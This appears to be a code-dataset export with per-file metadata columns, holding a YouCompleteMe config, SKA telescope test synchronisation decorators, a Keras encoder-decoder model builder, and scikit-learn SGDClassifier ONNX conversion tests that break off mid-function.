'Test Admin (testadmin@example.com)')
| 73.907767
| 128
| 0.702496
| 3,044
| 30,450
| 6.715506
| 0.03318
| 0.058996
| 0.043293
| 0.057529
| 0.969377
| 0.968643
| 0.968643
| 0.968643
| 0.959593
| 0.959202
| 0
| 0.000336
| 0.218489
| 30,450
| 411
| 129
| 74.087591
| 0.85868
| 0.018982
| 0
| 0.891117
| 0
| 0
| 0.152655
| 0.084972
| 0
| 0
| 0
| 0
| 0.083095
| 1
| 0.083095
| false
| 0
| 0.014327
| 0
| 0.114613
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
43823a8187624d8642540cc06d3d40173617fc50
| 241
|
py
|
Python
|
.ycm_extra_conf.py
|
Firenox89/mopidy-aurora
|
a2f365cb755218e15d04c9574b7ad154f6379f15
|
[
"Apache-2.0"
] | null | null | null |
.ycm_extra_conf.py
|
Firenox89/mopidy-aurora
|
a2f365cb755218e15d04c9574b7ad154f6379f15
|
[
"Apache-2.0"
] | null | null | null |
.ycm_extra_conf.py
|
Firenox89/mopidy-aurora
|
a2f365cb755218e15d04c9574b7ad154f6379f15
|
[
"Apache-2.0"
] | null | null | null |
def Settings( **kwargs ):
return {
'sys_path': [
'/home/firenox/git/mopidy-aurora/mopidy_aurora',
'/home/firenox/git/mopidy-aurora',
'/home/firenox/git/nanoleaf',
'/home/firenox/git/nanoleaf/nanoleaf'
]
}
| 24.1
| 54
| 0.614108
| 27
| 241
| 5.407407
| 0.444444
| 0.30137
| 0.383562
| 0.273973
| 0.534247
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.207469
| 241
| 9
| 55
| 26.777778
| 0.764398
| 0
| 0
| 0
| 0
| 0
| 0.60166
| 0.568465
| 0
| 0
| 0
| 0
| 0
| 1
| 0.111111
| true
| 0
| 0
| 0.111111
| 0.222222
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
|
0
| 9
|
78de7c83c234951d74a0f5768587f720a9b5ac99
| 20,058
|
py
|
Python
|
post-deployment/resources/test_support/sync_decorators.py
|
ska-telescope/tmc-prototype
|
4138274e933d4b05f7fe9fc34a11c417b6d0d336
|
[
"BSD-3-Clause"
] | 3
|
2019-01-10T11:49:36.000Z
|
2019-07-19T03:32:52.000Z
|
post-deployment/resources/test_support/sync_decorators.py
|
ska-telescope/tmc-prototype
|
4138274e933d4b05f7fe9fc34a11c417b6d0d336
|
[
"BSD-3-Clause"
] | 19
|
2019-01-07T14:50:26.000Z
|
2019-10-02T13:25:23.000Z
|
post-deployment/resources/test_support/sync_decorators.py
|
ska-telescope/tmc-prototype
|
4138274e933d4b05f7fe9fc34a11c417b6d0d336
|
[
"BSD-3-Clause"
] | 1
|
2018-12-21T13:39:23.000Z
|
2018-12-21T13:39:23.000Z
|
import functools
from resources.test_support.helpers import waiter, watch, resource
from contextlib import contextmanager
import signal
import logging
from contextlib import contextmanager
# pre cheks
def check_going_out_of_empty():
##verify once for obstate = EMPTY
resource("mid_csp/elt/subarray_01").assert_attribute("obsState").equals("EMPTY")
resource("mid_sdp/elt/subarray_1").assert_attribute("obsState").equals("EMPTY")
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals("EMPTY")
def check_going_into_configure():
##Can ony configure a subarray that is in IDLE/ON
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
["IDLE", "READY"]
)
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
def check_going_into_abort():
##Can ony invoke abort on a subarray when in IDLE, SCANNING, CONFIGURING, READY
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
["IDLE", "SCANNING", "CONFIGURING", "READY"]
)
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
def check_going_into_restart():
##Can ony invoke restart on a subarray when in ABORTED, FAULT
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
["ABORTED", "FAULT"]
)
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
def check_coming_out_of_standby():
##Can only start up a disabled telescope
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("OFF")
def check_going_out_of_configured():
##Can only return to ON/IDLE if in READY
resource("mid_csp/elt/subarray_01").assert_attribute("obsState").equals("READY")
resource("mid_sdp/elt/subarray_1").assert_attribute("obsState").equals("READY")
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals("READY")
def check_going_out_of_aborted():
##Can only return to ABORTED if in READY, SCANNING, CONFIGURING, IDLE
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
"ABORTED"
)
def check_going_out_of_abort():
##Can only return to ON/IDLE if in READY
print("Checking aborting obsState verification")
# resource('mid_csp/elt/subarray_01').assert_attribute('obsState').equals('ABORTED')
# resource('mid_sdp/elt/subarray_1').assert_attribute('obsState').equals('ABORTED')
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
"ABORTED"
)
def check_sa_going_into_fault():
##Can only return to IDLE if in FAULT
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals(
"FAULT"
)
def check_going_into_empty():
##Can only release resources if subarray is in ON/IDLE
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
print("In check_going_into_empty")
resource("ska_mid/tm_subarray_node/1").assert_attribute("obsState").equals("IDLE")
def check_going_into_standby():
print("In check_going_into_standby")
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
#Note: make use of this decorator while updatating integration tests for sp-1623
def check_coming_out_of_tmc_off():
##Can only start up a disabled telescope
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/csp_subarray01").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/sdp_subarray01").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/csp_master").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/csp_master").assert_attribute("State").equals("OFF")
resource("ska_mid/tm_leaf_node/d0001").assert_attribute("State").equals("OFF")
#Note: make use of this decorator while updating integration tests for sp-1623
def check_going_into_tmc_off_or_standby():
print("In check_going_into_tmc_off")
resource("ska_mid/tm_subarray_node/1").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/csp_subarray01").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/sdp_subarray01").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/csp_master").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/csp_master").assert_attribute("State").equals("ON")
resource("ska_mid/tm_leaf_node/d0001").assert_attribute("State").equals("ON")
def check_going_into_fault_for_cspsaln():
resource("ska_mid/tm_leaf_node/csp_subarray01").assert_attribute("State").equals("FAULT")
print("Check csp device going into Fault")
def check_going_into_fault_for_sdpsaln():
resource("ska_mid/tm_leaf_node/sdp_subarray01").assert_attribute("State").equals("FAULT")
print("Check sdp device going into Fault")
# pre waitings
class WaitConfigure:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self):
# self.w.wait_until_value_changed_to('CONFIGURING')
self.w.wait_until_value_changed_to("READY", timeout=500)
self.w1.wait_until_value_changed_to("READY", timeout=500)
self.w2.wait_until_value_changed_to("READY", timeout=500)
def wait_oet(self):
self.w.wait_until_value_changed_to("READY", timeout=200)
class WaitAbort:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self, timeout):
logging.info(
"Abort command dispatched, checking that the state transitioned to ABORTING"
)
# self.the_watch.wait_until_value_changed_to('ABORTING',timeout)
logging.info(
"state transitioned to ABORTING, waiting for it to return to ABORTED"
)
self.w.wait_until_value_changed_to("ABORTED", timeout=200)
self.w1.wait_until_value_changed_to("ABORTED", timeout=200)
self.w2.wait_until_value_changed_to("ABORTED", timeout=200)
class WaitRestart:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self, timeout):
logging.info(
"Restart command dispatched, checking that the state transitioned to RESTARTING"
)
# self.the_watch.wait_until_value_changed_to('RESTARTING',timeout)
logging.info(
"state transitioned to RESTARTING, waiting for it to return to EMPTY"
)
self.w.wait_until_value_changed_to("EMPTY", timeout=200)
self.w1.wait_until_value_changed_to("EMPTY", timeout=200)
self.w2.wait_until_value_changed_to("EMPTY", timeout=200)
class WaitObsReset:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self, timeout):
logging.info(
"ObsReset command dispatched, checking that the state transitioned to RESETTING"
)
logging.info(
"state transitioned to RESETTING, waiting for it to return to IDLE"
)
self.w.wait_until_value_changed_to("IDLE", timeout=200)
self.w1.wait_until_value_changed_to("IDLE", timeout=200)
self.w2.wait_until_value_changed_to("IDLE", timeout=200)
class WaitResetCspsaln:
def __init__(self):
self.w1 = watch(resource("ska_mid/tm_leaf_node/csp_subarray01")).for_a_change_on("State")
def wait(self, timeout):
logging.info(
"Reset command dispatched, checking that the state transitioned to OFF"
)
self.w1.wait_until_value_changed_to("OFF", timeout=200)
class WaitResetSdpsaln:
def __init__(self):
self.w = watch(resource("ska_mid/tm_leaf_node/sdp_subarray01")).for_a_change_on("State")
def wait(self, timeout):
logging.info(
"Reset command dispatched, checking that the state transitioned to OFF"
)
self.w.wait_until_value_changed_to("OFF", timeout=200)
class WaitScanning:
def __init__(self):
self.w = watch(resource("ska_mid/tm_subarray_node/1")).for_a_change_on(
"obsState"
)
self.w1 = watch(resource("mid_csp/elt/subarray_01")).for_a_change_on("obsState")
self.w2 = watch(resource("mid_sdp/elt/subarray_1")).for_a_change_on("obsState")
def wait(self, timeout):
logging.info(
"scan command dispatched, checking that the state transitioned to SCANNING"
)
self.w.wait_until_value_changed_to("SCANNING", timeout)
self.w1.wait_until_value_changed_to("SCANNING", timeout)
self.w2.wait_until_value_changed_to("SCANNING", timeout)
logging.info(
"state transitioned to SCANNING, waiting for it to return to READY"
)
self.w.wait_until_value_changed_to("READY", timeout)
self.w1.wait_until_value_changed_to("READY", timeout)
self.w2.wait_until_value_changed_to("READY", timeout)
def sync_assign_resources(nr_of_receptors=2, timeout=600):
# defined as a decorator
def decorator_sync_assign_resources(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_empty()
the_waiter = waiter()
the_waiter.set_wait_for_assign_resources(nr_of_receptors=nr_of_receptors)
################
result = func(*args, **kwargs)
################
the_waiter.wait(timeout=timeout)
return result
return wrapper
return decorator_sync_assign_resources
# defined as a context manager
@contextmanager
def sync_assigned_resources(nr_of_receptors=4):
check_going_out_of_empty()
the_waiter = waiter()
the_waiter.set_wait_for_assign_resources(nr_of_receptors=nr_of_receptors)
yield
the_waiter.wait(timeout=60)
##this is only in the case of using TMC device proxies, OET command is blocking for the entire duration
def sync_configure(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
##Can ony configure a subarray that is in IDLE/ON
check_going_into_configure()
w = WaitConfigure()
################
result = func(*args, **kwargs)
################
w.wait()
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_configuration():
check_going_into_configure()
w = WaitConfigure()
yield
w.wait()
def sync_configure_oet(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
##Can ony configure a subarray that is in IDLE/ON
check_going_into_configure()
w = WaitConfigure()
################
result = func(*args, **kwargs)
################
w.wait_oet()
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_oet_configuration():
check_going_into_configure()
w = WaitConfigure()
yield
w.wait_oet()
def handle_timeout(arg1, agr2):
print("operation timeout")
raise Exception("operation timeout")
def time_it(timeout):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
signal.signal(signal.SIGALRM, handle_timeout)
signal.alarm(timeout) # wait for timeout seconds and timeout if still stick
################
result = func(*args, **kwargs)
################
signal.alarm(0)
return result
return wrapper
return decorator
# defined as a context manager
@contextmanager
def limited_time_routine(timeout):
signal.signal(signal.SIGALRM, handle_timeout)
signal.alarm(timeout) # wait for timeout seconds and timeout if still stick
yield
signal.alarm(0)
def sync_start_up_telescope(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_coming_out_of_standby()
the_waiter = waiter()
the_waiter.set_wait_for_starting_up()
result = func(*args, **kwargs)
the_waiter.wait(50)
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_telescope_starting_up(timeout=50):
check_coming_out_of_standby()
the_waiter = waiter()
the_waiter.set_wait_for_starting_up()
yield
the_waiter.wait(timeout)
def sync_end_sb(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_configured()
the_waiter = waiter()
the_waiter.set_wait_for_ending_SB()
result = func(*args, **kwargs)
the_waiter.wait(300)
return result
return wrapper
def sync_restart_sa(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_aborted()
the_waiter = waiter()
the_waiter.set_wait_for_going_into_restarting()
result = func(*args, **kwargs)
the_waiter.wait(100)
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_sb_ending():
check_going_out_of_configured()
the_waiter = waiter()
the_waiter.set_wait_for_ending_SB()
yield
the_waiter.wait()
def sync_release_resources(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
print("In sync_release_resources")
check_going_into_empty()
the_waiter = waiter()
the_waiter.set_wait_for_tearing_down_subarray()
result = func(*args, **kwargs)
the_waiter.wait(150)
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_resources_releasing(timeout=100):
the_waiter = waiter()
the_waiter.set_wait_for_tearing_down_subarray()
yield
the_waiter.wait(timeout)
def sync_set_to_standby(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_standby()
the_waiter = waiter()
the_waiter.set_wait_for_going_to_standby()
result = func(*args, **kwargs)
the_waiter.wait(100)
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_going_to_standby(timeout=50):
check_going_into_standby()
the_waiter = waiter()
the_waiter.set_wait_for_going_to_standby()
yield
the_waiter.wait(timeout)
def sync_scan(timeout=500):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_configured()
w = WaitScanning()
result = func(*args, **kwargs)
w.wait(timeout)
return result
return wrapper
return decorator
def sync_abort(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_abort()
w = WaitAbort()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_restart(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
# check_going_into_restart()
check_going_out_of_abort()
w = WaitRestart()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_obsreset(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
# check_going_into_resetting()
check_going_out_of_abort()
w = WaitObsReset()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_obsreset_sa(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_sa_going_into_fault()
w = WaitObsReset()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_cspsaln_reset(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_fault_for_cspsaln()
w = WaitResetCspsaln()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
def sync_sdpsaln_reset(timeout=200):
def decorator(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
# check_going_into_resetting()
check_going_into_fault_for_sdpsaln()
w = WaitResetSdpsaln()
################
result = func(*args, **kwargs)
################
w.wait(timeout)
return result
return wrapper
return decorator
# defined as a context manager
@contextmanager
def sync_scanning(timeout=200):
check_going_out_of_configured()
w = WaitScanning()
yield
w.wait(timeout)
def sync_scan_oet(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_out_of_configured()
the_waiter = waiter()
the_waiter.set_wait_for_going_into_scanning()
result = func(*args, **kwargs)
the_waiter.wait()
return result
return wrapper
# defined as a context manager
@contextmanager
def sync_oet_scanning():
check_going_out_of_configured()
the_waiter = waiter()
the_waiter.set_wait_for_going_into_scanning()
yield
the_waiter.wait()
#Note: make use of this method while updating integration tests for sp-1623
def sync_tmc_on(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_coming_out_of_tmc_off()
the_waiter = waiter()
the_waiter.set_wait_for_tmc_up()
result = func(*args, **kwargs)
the_waiter.wait(50)
return result
return wrapper
#Note: make use of this method while updating integration tests for sp-1623
def sync_tmc_off(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_tmc_off_or_standby()
the_waiter = waiter()
the_waiter.set_wait_for_going_to_off()
result = func(*args, **kwargs)
the_waiter.wait(100)
return result
return wrapper
#Note: make use of this method while updating integration tests for sp-1623
def sync_tmc_standby(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
check_going_into_tmc_off_or_standby()
the_waiter = waiter()
the_waiter.set_wait_for_going_to_standby()
result = func(*args, **kwargs)
the_waiter.wait(100)
return result
return wrapper
| 31.291732
| 103
| 0.659836
| 2,550
| 20,058
| 4.89451
| 0.07451
| 0.034613
| 0.040381
| 0.04615
| 0.870042
| 0.84216
| 0.80931
| 0.770531
| 0.717811
| 0.649147
| 0
| 0.014236
| 0.219015
| 20,058
| 641
| 104
| 31.291732
| 0.782509
| 0.097816
| 0
| 0.64588
| 0
| 0
| 0.163262
| 0.080982
| 0
| 0
| 0
| 0
| 0.073497
| 1
| 0.200445
| false
| 0
| 0.013363
| 0
| 0.33853
| 0.017817
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
78fc376bd7411b06dcf72116dba11999ee702ba7
| 4,698
|
py
|
Python
|
train/Models/VCD.py
|
louisletoumelin/wind_downscaling_cnn
|
9d08711620db1ee1f472847f0e822c5f4eb1d300
|
[
"W3C"
] | null | null | null |
train/Models/VCD.py
|
louisletoumelin/wind_downscaling_cnn
|
9d08711620db1ee1f472847f0e822c5f4eb1d300
|
[
"W3C"
] | 12
|
2021-11-30T16:56:05.000Z
|
2021-12-13T16:26:31.000Z
|
train/Models/VCD.py
|
louisletoumelin/wind_downscaling_cnn
|
9d08711620db1ee1f472847f0e822c5f4eb1d300
|
[
"W3C"
] | null | null | null |
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout, Flatten, Conv2D, MaxPool2D, Flatten, BatchNormalization, LeakyReLU, \
LSTM, UpSampling2D, Conv2DTranspose, ZeroPadding2D, Cropping2D, UpSampling1D
def build_VCD(prm):
model = Sequential()
model.add(ZeroPadding2D(padding=((0, 1), (0, 1)), input_shape=prm['input_shape']))
# CONVOLUTION
model.add(Conv2D(prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2D(prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(MaxPool2D(pool_size=prm['pool_size']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2D(2 * prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2D(2 * prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(MaxPool2D(pool_size=prm['pool_size']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2D(4 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2D(4 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(MaxPool2D(pool_size=prm['pool_size']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2D(8 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2D(8 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
# DECONVOLUTION
model.add(Conv2DTranspose(8 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2DTranspose(8 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(UpSampling2D(size=prm['up_conv']))
model.add(ZeroPadding2D(padding=((0, 0), (0, 1))))
model.add(Conv2DTranspose(4 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2DTranspose(4 * prm['nb_filters'], (3, 3), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(UpSampling2D(size=prm['up_conv']))
model.add(ZeroPadding2D(padding=((0, 0), (0, 1))))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2DTranspose(2 * prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2DTranspose(2 * prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(UpSampling2D(size=prm['up_conv']))
model.add(BatchNormalization())
model.add(Dropout(prm['dropout']))
model.add(Conv2DTranspose(prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Conv2DTranspose(prm['nb_filters'], (5, 5), activation=prm['activation'], padding=prm['padding'],
kernel_initializer=prm['initializer_func']))
model.add(Dropout(prm['dropout']))
model.add(Conv2DTranspose(prm['nb_channels_output'], (5, 5), activation=prm['activation_regression'],
padding=prm['padding'], kernel_initializer=prm['initializer_func']))
model.add(Cropping2D(cropping=((0, 1), (0, 1))))
return (model)
def VCD(prm):
model = build_VCD(prm)
print('\n Model selected: VCD\n')
print(model.summary())
return (model)
| 52.786517
| 121
| 0.640911
| 533
| 4,698
| 5.525328
| 0.106942
| 0.114092
| 0.132767
| 0.132767
| 0.858065
| 0.839728
| 0.839728
| 0.839728
| 0.839728
| 0.839728
| 0
| 0.025059
| 0.184547
| 4,698
| 88
| 122
| 53.386364
| 0.74367
| 0.005321
| 0
| 0.814286
| 0
| 0
| 0.190364
| 0.004497
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0
| 0.028571
| 0
| 0.085714
| 0.028571
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
60300106bf44a156fb6f85f17351087c4892209d
| 17,287
|
py
|
Python
|
tests/test_sklearn_sgd_classifier_converter.py
|
vinitra-zz/sklearn-onnx
|
a8f2657525d0b4dd279bcd1a971397d002929a77
|
[
"MIT"
] | null | null | null |
tests/test_sklearn_sgd_classifier_converter.py
|
vinitra-zz/sklearn-onnx
|
a8f2657525d0b4dd279bcd1a971397d002929a77
|
[
"MIT"
] | null | null | null |
tests/test_sklearn_sgd_classifier_converter.py
|
vinitra-zz/sklearn-onnx
|
a8f2657525d0b4dd279bcd1a971397d002929a77
|
[
"MIT"
] | 1
|
2020-10-01T09:26:27.000Z
|
2020-10-01T09:26:27.000Z
|
"""Tests scikit-learn's SGDClassifier converter."""
import unittest
import numpy as np
from sklearn.linear_model import SGDClassifier
from skl2onnx import convert_sklearn
from skl2onnx.common.data_types import FloatTensorType, Int64TensorType
from skl2onnx.common.data_types import onnx_built_with_ml
from test_utils import dump_data_and_model, fit_classification_model
class TestSGDClassifierConverter(unittest.TestCase):
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_hinge(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_hinge(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_hinge_string(self):
model, X = fit_classification_model(
SGDClassifier(loss='hinge', random_state=42), 5, label_string=True)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiHinge-Out0",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_log(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryLog-Dec4",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_log(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', random_state=42), 5)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD multi-class classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
X = np.array([X[1], X[1]])
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierMultiLog",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_binary_class_log_l1_no_intercept(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', penalty='l1', fit_intercept=False,
random_state=42), 2)
model_onnx = convert_sklearn(
model,
"scikit-learn SGD binary classifier",
[("input", FloatTensorType([None, X.shape[1]]))],
)
self.assertIsNotNone(model_onnx)
dump_data_and_model(
X.astype(np.float32),
model,
model_onnx,
basename="SklearnSGDClassifierBinaryLogL1NoIntercept-Dec4",
allow_failure="StrictVersion(onnx.__version__)"
" < StrictVersion('1.2') or "
"StrictVersion(onnxruntime.__version__)"
" <= StrictVersion('0.2.1')",
)
@unittest.skipIf(not onnx_built_with_ml(),
reason="Requires ONNX-ML extension.")
def test_model_sgd_multi_class_log_l1_no_intercept(self):
model, X = fit_classification_model(
SGDClassifier(loss='log', penalty='l1', fit_intercept=False,
random_state=42), 5)
X = np.array([X[4], X[4]])
